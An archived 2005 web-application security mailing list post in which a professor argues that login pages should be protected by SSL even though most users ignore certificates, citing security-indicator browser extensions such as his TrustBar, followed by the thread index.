WebApp Sec mailing list archives
Rephrased: Should login pages be protected by SSL - although it won'thelp most users?
From: Amir Herzberg <herzbea () macs biu ac il>
Date: Thu, 23 Jun 2005 08:29:22 +0200
Ole Kasper Olsen wrote: ...
Amir Herzberg asked the question of "should login pages be SSL encrypted". The flurry of discussion can be summerized as "Yes"......2. Most people believe that a login page *should* be encrypted for web sites carrying important data. (e.g., financial, etc.)
And many such sites are not protected, see `Hall of Shame` (link below)
Encryption is not the point. Authentication is. A login page will never contain sensitive data anyway and as long as the form is submitted to a secure server, the data is encrypted just fine. A problem arises when a customer is tricked into entering credentials at an a bogus site.
Absolutely.
SSL/TLS has decent capability for providing authentication, however the sad truth is (as Michael Silk noted) that a vast majority of surfers do not understand nor read certificates. People don't even look at the URL (many (probably very successful) scams just rely on a semi-decent-looking link which points to an IP address).
This is correct, given the current security indicators in browsers; I even have some empirical data to support this (but it is also common sense). However, the use of SSL may help _some_ users:
-- The few users who carefully check the URL, padlock, certificate-- Users who install browsers/extensions providing improved security/identification indicators such as our TrustBar
People in favor of unprotected login pages (mostly people in charge of them?) claim that both users groups above are negligible and do not justify using SSL.
I disagree; for example, TrustBar is available thru multiple sites, and I have statistics only from http://addons.mozilla.org, and there I have over 25000 downloads. BTW this site also allows user feedback, which you are encouraged to leave, I read it carefully and I believe our next release will in fact take care of almost all concerns raised by users.
And of course there are other improved security indicators solutions such as Netcraft, TrustToolBar (although I don't like their privacy invasion and overhead).
This situation is also not helping convince browser folks to add the improved security UI to the browser (so I can get rid of developing TrustBar... have some other research projects to take care of!)
-- Best regards, Amir Herzberg Associate Professor Department of Computer Science Bar Ilan University http://AmirHerzberg.com Hall Of Shame of Unprotected Login pages: http://AmirHerzberg.com/shame.htm
Current thread:
- Re: Should login pages be protected by SSL?, (continued)
- Re: Should login pages be protected by SSL? Andrew van der Stock (Jun 21)
- Re: Should login pages be protected by SSL? (and comment to moderator) Amir Herzberg (Jun 21)
- Re: Should login pages be protected by SSL? (and comment to moderator) Andrew van der Stock (Jun 21)
- Re: PCI standards & Should login pages be protected by SSL? Peter Watkins (Jun 21)
- RE: PCI standards & Should login pages be protected by SSL? Lyal Collins (Jun 22)
- Re: Should login pages be protected by SSL? (and comment to moderator) Amir Herzberg (Jun 21)
- Re: Should login pages be protected by SSL? Steve Shah (Jun 21)
- Re: Should login pages be protected by SSL? Amir Herzberg (Jun 21)
- [summary] Re: Should login pages be protected by SSL? Steve Shah (Jun 22)
- Re: [summary] Re: Should login pages be protected by SSL? Ole Kasper Olsen (Jun 23)
- Rephrased: Should login pages be protected by SSL - although it won'thelp most users? Amir Herzberg (Jun 23)
- Re: [summary] Re: Should login pages be protected by SSL? Devdas Bhagat (Jun 23)
- Re: [summary] Re: Should login pages be protected by SSL? Michael Silk (Jun 23)
- Re: [summary] Re: Should login pages be protected by SSL? Wolfgang Reder (Jun 24)
- Re: [summary] Re: Should login pages be protected by SSL? Michael Silk (Jun 24)
- Re: Should login pages be protected by SSL? Dave Ockwell-Jenner (Jun 22)
- Re: Should login pages be protected by SSL? Achim Hoffmann (Jun 23)
- RE: Should login pages be protected by SSL? Glenn Euloth (Jun 21)